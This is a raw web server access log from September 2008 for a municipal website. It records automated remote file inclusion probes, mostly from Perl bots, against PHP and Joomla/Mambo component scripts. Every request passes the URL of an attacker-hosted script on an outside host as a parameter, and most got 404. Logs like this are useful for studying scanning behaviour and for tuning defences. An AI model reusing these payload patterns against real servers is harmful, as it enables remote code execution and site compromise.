72.9.233.10 - - [01/Sep/2008:03:16:36 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:03:16:36 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:03:16:36 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:03:16:54 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:03:16:54 -0700] "GET //components/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:03:16:55 -0700] "GET /logs//components/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:18:01 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:18:01 -0700] "GET //components/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:18:01 -0700] "GET /logs//components/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:18:15 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:18:15 -0700] "GET //components/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:18:15 -0700] "GET /logs//components/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
65.36.166.240 - - [01/Sep/2008:03:18:51 -0700] "GET /logs/access.log////////?mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
65.36.166.240 - - [01/Sep/2008:03:18:51 -0700] "GET ////////?mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 200 923 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
65.36.166.240 - - [01/Sep/2008:03:18:51 -0700] "GET /logs////////?mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 200 4095 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:03:20:11 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:03:20:12 -0700] "GET //components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:03:20:12 -0700] "GET /logs//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:03:20:15 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:03:20:15 -0700] "GET //components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:03:20:15 -0700] "GET /logs//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:03:20:20 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:03:20:20 -0700] "GET //components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:03:20:20 -0700] "GET /logs//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:03:22:18 -0700] "GET //config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:35 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:35 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:36 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:43 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:44 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:44 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:47 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:47 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:03:23:48 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.149.115.2 - - [01/Sep/2008:03:25:57 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://pepp0z.interfree.it/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.149.115.2 - - [01/Sep/2008:03:25:57 -0700] "GET //components/errors.php?error=http://pepp0z.interfree.it/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.149.115.2 - - [01/Sep/2008:03:25:57 -0700] "GET /logs//components/errors.php?error=http://pepp0z.interfree.it/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.149.115.2 - - [01/Sep/2008:03:25:57 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://pepp0z.interfree.it/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.149.115.2 - - [01/Sep/2008:03:25:58 -0700] "GET //components/errors.php?error=http://pepp0z.interfree.it/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.149.115.2 - - [01/Sep/2008:03:25:58 -0700] "GET /logs//components/errors.php?error=http://pepp0z.interfree.it/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
65.36.166.240 - - [01/Sep/2008:03:26:55 -0700] "GET /logs/access_080201.log////////?mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:03:30:28 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:03:30:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:03:30:40 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:31:34 -0700] "GET /logs/access.log//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:03:31:44 -0700] "GET /logs/access_080329.log//update5.php?lang=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:31:44 -0700] "GET /logs/access.log//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:03:31:45 -0700] "GET //update5.php?lang=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:03:31:45 -0700] "GET /logs//update5.php?lang=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:03:31:55 -0700] "GET //update5.php?lang=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:32:27 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:32:27 -0700] "GET //components/errors.php?error=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:32:27 -0700] "GET /logs//components/errors.php?error=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
208.109.18.146 - - [01/Sep/2008:03:32:33 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
208.109.18.146 - - [01/Sep/2008:03:32:34 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:32:54 -0700] "GET /logs/access.log//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:33:11 -0700] "GET /logs/access.log//components/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:33:33 -0700] "GET /logs/access.log//components/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:33:41 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:33:41 -0700] "GET //config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:33:42 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:34:04 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:03:36:11 -0700] "GET /logs/access.log//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:03:36:20 -0700] "GET /logs/access.log//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
201.130.79.38 - - [01/Sep/2008:03:36:23 -0700] "GET /logs/access.log//components/errors.php?error=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:03:37:30 -0700] "GET /logs/access.log//components/errors.php?error=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
85.17.6.7 - - [01/Sep/2008:03:37:33 -0700] "GET /logs/access.log//components/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
72.9.248.162 - - [01/Sep/2008:03:37:34 -0700] "GET /logs/access_080601.log//update5.php?lang=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
190.83.18.253 - - [01/Sep/2008:03:37:45 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:38:14 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:38:14 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:38:14 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:38:14 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:38:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
209.52.173.110 - - [01/Sep/2008:03:38:15 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://giam.go.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:38:54 -0700] "GET /logs/access.log//components/errors.php?error=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:39:37 -0700] "GET /logs/access_080330.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:39:37 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:39:38 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
201.130.79.38 - - [01/Sep/2008:03:40:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.130.79.38 - - [01/Sep/2008:03:40:52 -0700] "GET //config/dbutil.bck.php?confdir=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.130.79.38 - - [01/Sep/2008:03:40:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:42:05 -0700] "GET /logs/access_071231.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
201.130.79.38 - - [01/Sep/2008:03:42:12 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:03:42:17 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:03:42:18 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:03:42:24 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:03:42:26 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
65.182.184.197 - - [01/Sep/2008:03:45:25 -0700] "GET /errors.php?error=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.98.192.98 - - [01/Sep/2008:03:46:26 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
66.98.192.98 - - [01/Sep/2008:03:46:26 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.futurecontent.co.uk/titles/emeles/taster/media/media/bunokx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:35 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
212.227.165.161 - - [01/Sep/2008:03:46:37 -0700] "GET /logs/access_080329.log/!scanhttp://danieledm.altervista.org/PhP/id_osirys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
212.227.165.161 - - [01/Sep/2008:03:46:37 -0700] "GET /!scanhttp://danieledm.altervista.org/PhP/id_osirys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
212.227.165.161 - - [01/Sep/2008:03:46:37 -0700] "GET /logs/!scanhttp://danieledm.altervista.org/PhP/id_osirys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:38 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:39 -0700] "GET //components/errors.php?error=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:39 -0700] "GET //components/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:40 -0700] "GET /logs//components/errors.php?error=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:44 -0700] "GET /logs//components/errors.php?error=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:47 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:48 -0700] "GET //components/errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:03:46:49 -0700] "GET /logs//components/errors.php?error=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
61.19.158.41 - - [01/Sep/2008:03:47:07 -0700] "GET /logs/access_080731.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
202.47.247.136 - - [01/Sep/2008:03:47:12 -0700] "GET /logs/access_080731.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
202.47.247.136 - - [01/Sep/2008:03:47:13 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
202.47.247.136 - - [01/Sep/2008:03:47:17 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
212.227.165.161 - - [01/Sep/2008:03:47:44 -0700] "GET /logs/access.log/!scanhttp://danieledm.altervista.org/PhP/id_osirys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:03:48:46 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:03:48:49 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:03:48:59 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
212.227.165.161 - - [01/Sep/2008:03:52:37 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://danieledm.altervista.org/PhP/id_osirys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
212.227.165.161 - - [01/Sep/2008:03:52:37 -0700] "GET //config/dbutil.bck.php?confdir=http://danieledm.altervista.org/PhP/id_osirys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
212.227.165.161 - - [01/Sep/2008:03:52:37 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://danieledm.altervista.org/PhP/id_osirys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
